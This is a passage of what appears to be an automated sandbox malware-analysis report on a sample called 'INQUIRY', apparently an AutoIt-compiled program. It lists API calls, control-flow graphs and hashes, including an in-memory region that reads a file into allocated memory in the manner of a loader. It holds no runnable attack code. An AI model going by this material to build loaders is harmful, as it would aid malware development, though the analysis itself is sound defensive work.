                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A20F20
                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00A54E83
                                                                                              • TranslateMessage.USER32(?), ref: 00A55C60
                                                                                              • DispatchMessageW.USER32(?), ref: 00A55C6E
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A55C82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                              • API String ID: 4212290369-3242690629
                                                                                              • Opcode ID: 67a63bbdec51c0968b32f950600edf130289faa60b61e7ebe0176d65307671af
                                                                                              • Instruction ID: 2c0c70366dbbe872e6a0da302420d9dea859dee1ae5dba1f3a338dd93c9efd3e
                                                                                              • Opcode Fuzzy Hash: 67a63bbdec51c0968b32f950600edf130289faa60b61e7ebe0176d65307671af
                                                                                              • Instruction Fuzzy Hash: 24B2C370A08741DFD724DF24C994FAAB7F5BF84305F14492DE94A972A2CB71E889CB42
                                                                                              Function 00A79155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A78F5F: __time64.LIBCMT ref: 00A78F69
                                                                                                • Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD
                                                                                              • __wsplitpath.LIBCMT ref: 00A79234
                                                                                                • Part of subcall function 00A340FB: __wsplitpath_helper.LIBCMT ref: 00A3413B
                                                                                              • _wcscpy.LIBCMT ref: 00A79247
                                                                                              • _wcscat.LIBCMT ref: 00A7925A
                                                                                              • __wsplitpath.LIBCMT ref: 00A7927F
                                                                                              • _wcscat.LIBCMT ref: 00A79295
                                                                                              • _wcscat.LIBCMT ref: 00A792A8
                                                                                                • Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FDE
                                                                                                • Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FED
                                                                                              • _wcscmp.LIBCMT ref: 00A791EF
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A79452
                                                                                              • _wcsncpy.LIBCMT ref: 00A794C5
                                                                                              • DeleteFileW.KERNEL32(?,?), ref: 00A794FB
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A79511
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79522
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79534
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 1500180987-0
                                                                                              • Opcode ID: 690f717a224ef3279a3a48c84b7e490148b542eb74e33a99892cfa5d4b05b2d8
                                                                                              • Instruction ID: 79b0142b0619e722d3328dda0187cb28abbf42d7a5b13deaca2e3fd524568954
                                                                                              • Opcode Fuzzy Hash: 690f717a224ef3279a3a48c84b7e490148b542eb74e33a99892cfa5d4b05b2d8
                                                                                              • Instruction Fuzzy Hash: 85C11DB1E00119AADF11DF95CD85ADFBBBDEF49310F0080AAF609E7151DB309A858F65
                                                                                              Function 00A13015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A13074
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00A1309E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
                                                                                              • LoadIconW.USER32(000000A9), ref: 00A130F2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
                                                                                              • Instruction ID: db0f09f5d7b34922387bc026e5f0a9bfe00449f4921bd75918df048a97ea592d
                                                                                              • Opcode Fuzzy Hash: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
                                                                                              • Instruction Fuzzy Hash: 9631E2B1941249AFDB10CFE4E889ADDBBF4FB09310F14452FE581E62A0E7B50586DF51
                                                                                              Function 00A13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A13074
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00A1309E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
                                                                                              • LoadIconW.USER32(000000A9), ref: 00A130F2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
                                                                                              • Instruction ID: 41ffde6368847b10818c59de2353a23765a4ee7481e4221dd2529340b7b80e24
                                                                                              • Opcode Fuzzy Hash: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
                                                                                              • Instruction Fuzzy Hash: C321B4B1E01618AFDB00DFE4E889ADDBBF8FB08701F10412BF911E62A0DBB145559F91
                                                                                              Function 00A1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AD52F8,?,00A137AE,?), ref: 00A14724
                                                                                                • Part of subcall function 00A3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A17165), ref: 00A3052D
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A171A8
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A4E8C8
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A4E909
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A4E947
                                                                                              • _wcscat.LIBCMT ref: 00A4E9A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 2673923337-2727554177
                                                                                              • Opcode ID: c59e3967af6231ea63b2cfe0909cd5f64b8d604e6c7cf3650b64368ced0b7cba
                                                                                              • Instruction ID: f73baab91a6483718dc2f1dc1a0d6c3d034abce1b5db1b507e5057701be50da4
                                                                                              • Opcode Fuzzy Hash: c59e3967af6231ea63b2cfe0909cd5f64b8d604e6c7cf3650b64368ced0b7cba
                                                                                              • Instruction Fuzzy Hash: 89714C719093019EC704EFA5E9819EBBBF8FF85350F40092FF446871A1EB719949CB92
                                                                                              Function 00A13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A13A50
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
                                                                                              • LoadIconW.USER32(00000063), ref: 00A13A76
                                                                                              • LoadIconW.USER32(000000A4), ref: 00A13A88
                                                                                              • LoadIconW.USER32(000000A2), ref: 00A13A9A
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
                                                                                              • RegisterClassExW.USER32(?), ref: 00A13B16
                                                                                                • Part of subcall function 00A13041: GetSysColorBrush.USER32(0000000F), ref: 00A13074
                                                                                                • Part of subcall function 00A13041: RegisterClassExW.USER32(00000030), ref: 00A1309E
                                                                                                • Part of subcall function 00A13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
                                                                                                • Part of subcall function 00A13041: InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
                                                                                                • Part of subcall function 00A13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
                                                                                                • Part of subcall function 00A13041: LoadIconW.USER32(000000A9), ref: 00A130F2
                                                                                                • Part of subcall function 00A13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
                                                                                              • Instruction ID: 989300c30815616a0b0ff5af356387daa5d13cfc91507d69c8894820ad69f240
                                                                                              • Opcode Fuzzy Hash: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
                                                                                              • Instruction Fuzzy Hash: 6F2128B1E02304AFEB10DFF4EC09BED7BB0EB08712F10012AE505A62A1D7B556568F84
                                                                                              Function 00A13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 767 a13633-a13681 769 a136e1-a136e3 767->769 770 a13683-a13686 767->770 769->770 771 a136e5 769->771 772 a136e7 770->772 773 a13688-a1368f 770->773 774 a136ca-a136d2 DefWindowProcW 771->774 775 a4d0cc-a4d0fa call a21070 call a21093 772->775 776 a136ed-a136f0 772->776 777 a13695-a1369a 773->777 778 a1374b-a13753 PostQuitMessage 773->778 782 a136d8-a136de 774->782 810 a4d0ff-a4d106 775->810 783 a136f2-a136f3 776->783 784 a13715-a1373c SetTimer RegisterWindowMessageW 776->784 779 a4d154-a4d168 call a72527 777->779 780 a136a0-a136a2 777->780 781 a13711-a13713 778->781 779->781 804 a4d16e 779->804 787 a13755-a13764 call a144a0 780->787 788 a136a8-a136ad 780->788 781->782 791 a136f9-a1370c KillTimer call a1443a call a13114 783->791 792 a4d06f-a4d072 783->792 784->781 789 a1373e-a13749 CreatePopupMenu 784->789 787->781 794 a136b3-a136b8 788->794 795 a4d139-a4d140 788->795 789->781 791->781 798 a4d074-a4d076 792->798 799 a4d0a8-a4d0c7 MoveWindow 792->799 802 a4d124-a4d134 call a72d36 794->802 803 a136be-a136c4 794->803 795->774 809 a4d146-a4d14f call a67c36 795->809 806 a4d097-a4d0a3 SetFocus 798->806 807 a4d078-a4d07b 798->807 799->781 802->781 803->774 803->810 804->774 806->781 807->803 811 a4d081-a4d092 call a21070 807->811 809->774 810->774 816 a4d10c-a4d11f call a1443a call a1434a 810->816 811->781 816->774
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00A136D2
                                                                                              • KillTimer.USER32(?,00000001), ref: 00A136FC
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A1371F
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A1372A
                                                                                              • CreatePopupMenu.USER32 ref: 00A1373E
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00A1374D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: df62bd1614c2441c895684f83eb1dddaca602277071e135e33a4f1181d1e1d8d
                                                                                              • Instruction ID: 5e0fd72db7d481167312f650eeafc7d681e6794c22d5dbd0cf9849a03c79939f
                                                                                              • Opcode Fuzzy Hash: df62bd1614c2441c895684f83eb1dddaca602277071e135e33a4f1181d1e1d8d
                                                                                              • Instruction Fuzzy Hash: F24107B7604545BBDF24DFB8ED09BFE37A4EB44301F140126F603D62E1EA609E86A761
                                                                                              Function 00A13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                              • API String ID: 1825951767-3513169116
                                                                                              • Opcode ID: 4186158c796fdced7afa4e5a8bb392debf423c353bbd1c8868c9439f8fcd05d0
                                                                                              • Instruction ID: 15a998037f4010e637aae58e3e1544f650e68182f51dee6592d1567d7b3eeb5c
                                                                                              • Opcode Fuzzy Hash: 4186158c796fdced7afa4e5a8bb392debf423c353bbd1c8868c9439f8fcd05d0
                                                                                              • Instruction Fuzzy Hash: A1A14B76D0021DAACF04EFE4DD91AEEBBB8BF14350F44042AF416A7191EF745A89CB60
                                                                                              Function 01DA25E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 942 1da25e0-1da268e call 1da0000 945 1da2695-1da26bb call 1da34f0 CreateFileW 942->945 948 1da26bd 945->948 949 1da26c2-1da26d2 945->949 950 1da280d-1da2811 948->950 954 1da26d9-1da26f3 VirtualAlloc 949->954 955 1da26d4 949->955 952 1da2853-1da2856 950->952 953 1da2813-1da2817 950->953 956 1da2859-1da2860 952->956 957 1da2819-1da281c 953->957 958 1da2823-1da2827 953->958 961 1da26fa-1da2711 ReadFile 954->961 962 1da26f5 954->962 955->950 963 1da2862-1da286d 956->963 964 1da28b5-1da28ca 956->964 957->958 959 1da2829-1da2833 958->959 960 1da2837-1da283b 958->960 959->960 967 1da284b 960->967 968 1da283d-1da2847 960->968 969 1da2718-1da2758 VirtualAlloc 961->969 970 1da2713 961->970 962->950 971 1da286f 963->971 972 1da2871-1da287d 963->972 965 1da28da-1da28e2 964->965 966 1da28cc-1da28d7 VirtualFree 964->966 966->965 967->952 968->967 973 1da275a 969->973 974 1da275f-1da277a call 1da3740 969->974 970->950 971->964 975 1da287f-1da288f 972->975 976 1da2891-1da289d 972->976 973->950 982 1da2785-1da278f 974->982 980 1da28b3 975->980 977 1da28aa-1da28b0 976->977 978 1da289f-1da28a8 976->978 977->980 978->980 980->956 983 1da27c2-1da27d6 call 1da3550 982->983 984 1da2791-1da27c0 call 1da3740 982->984 990 1da27da-1da27de 983->990 991 1da27d8 983->991 984->982 992 1da27ea-1da27ee 990->992 993 1da27e0-1da27e4 CloseHandle 990->993 991->950 994 1da27fe-1da2807 992->994 995 1da27f0-1da27fb VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01DA26B1
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01DA28D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileFreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 204039940-0
                                                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                              • Instruction ID: 2cc46aa6bbada852f0c4f1d0acca541bc4ad1a050e33d65c66a3b10321828d6f
                                                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                              • Instruction Fuzzy Hash: 5DA10774E00209EBDF14CFA5C994BAEBBB5FF48304F608159E501BB280D7799A81CFA4
                                                                                              Function 00A139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1073 a139d5-a13a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00A13A38
                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00A13A41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
                                                                                              • Instruction ID: cb384e569d2e2501d4ff81ae1102abae429e530af1bca027848d31e3f12ce3b3
                                                                                              • Opcode Fuzzy Hash: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
                                                                                              • Instruction Fuzzy Hash: 83F03A70A022907EEA3097A36C48EAB3F7DE7C6F50B00002BB901E2170C6614806CAB0
                                                                                              Function 01DA23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1074 1da23b0-1da24d8 call 1da0000 call 1da22a0 CreateFileW 1081 1da24da 1074->1081 1082 1da24df-1da24ef 1074->1082 1083 1da258f-1da2594 1081->1083 1085 1da24f1 1082->1085 1086 1da24f6-1da2510 VirtualAlloc 1082->1086 1085->1083 1087 1da2512 1086->1087 1088 1da2514-1da252b ReadFile 1086->1088 1087->1083 1089 1da252f-1da2569 call 1da22e0 call 1da12a0 1088->1089 1090 1da252d 1088->1090 1095 1da256b-1da2580 call 1da2330 1089->1095 1096 1da2585-1da258d ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                                                              APIs
                                                                                                • Part of subcall function 01DA22A0: Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01DA24CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileSleep
                                                                                              • String ID: ZJX0NH3Q9U3PICZ44ILODR
                                                                                              • API String ID: 2694422964-2233071432
                                                                                              • Opcode ID: 4019f6afc43fe06ae23ae6e5b73a38cb9a203682bad7fb1804503037f5e73d7c
                                                                                              • Instruction ID: ae93d25697bcd4de363ae06caea9c0605c51b3588a82a51fb43a1194a0f147a0
                                                                                              • Opcode Fuzzy Hash: 4019f6afc43fe06ae23ae6e5b73a38cb9a203682bad7fb1804503037f5e73d7c
                                                                                              • Instruction Fuzzy Hash: E451C570D04289EAEF11DBE4C854BEFBBB8AF19300F404199E6497B2C1D7B95B44CBA5
                                                                                              Function 00A1407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
